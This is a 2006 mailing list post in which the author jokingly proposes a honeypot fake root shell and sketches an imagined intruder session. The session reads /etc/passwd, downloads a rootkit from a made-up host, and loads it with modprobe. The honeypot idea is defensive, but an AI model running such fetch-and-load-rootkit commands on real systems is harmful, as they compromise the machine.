abuse@ and postmaster@ in the modern world?

Jonathan Rockway jon at jrock.us
Fri Nov 17 21:09:15 GMT 2006

Andy Armstrong wrote:
> On 17 Nov 2006, at 17:05, Toby Corkindale wrote:
>> Hmm. pam_abl allows people to continue to *try* to login, albeit
>> automatically
>> failing them.
> Yup - I liked the idea of allowing them to waste their time :)

I think it would be even more fun to give them something that looks like
a root shell and see what they do with it:

Login successful!
This is OpenLinuxBSD-NT 1.3.37 built in The Mysterious Future!
All activity is unmonitored, so definitely feel free to serve warez!
# id
root(0) groups=wheel
# uptime
# cat /etc/passwd
root:*:0:0:Enoch Root:...
# ftp http://secretrootkit.com/rootkit.ko
[=================>] 100% (0:08)
# modprobe rootkit.ko
Oops: 0000 [#1]
Modules linked in: foo bar baz
CPU: 0
EIP: 0060: [<00000000>] Tainted

etc. Great way to see what hackers are really doing to the machines they
compromise, and to see whether or not they try to debug the oops ;)
Plus, the time they waste with your machine is time that they no longer
have to waste on real machines.

Jonathan Rockway

package JAPH;use Catalyst qw/-Debug/;($;=JAPH)->config(name => do {
$,.=reverse qw[Jonathan tsu rehton lre rekca Rockway][$_].[split //,
";$;"]->[$_].q; ;for 1..4;$,=~s;^.;;;$,});$;->setup;

More information about the london.pm mailing list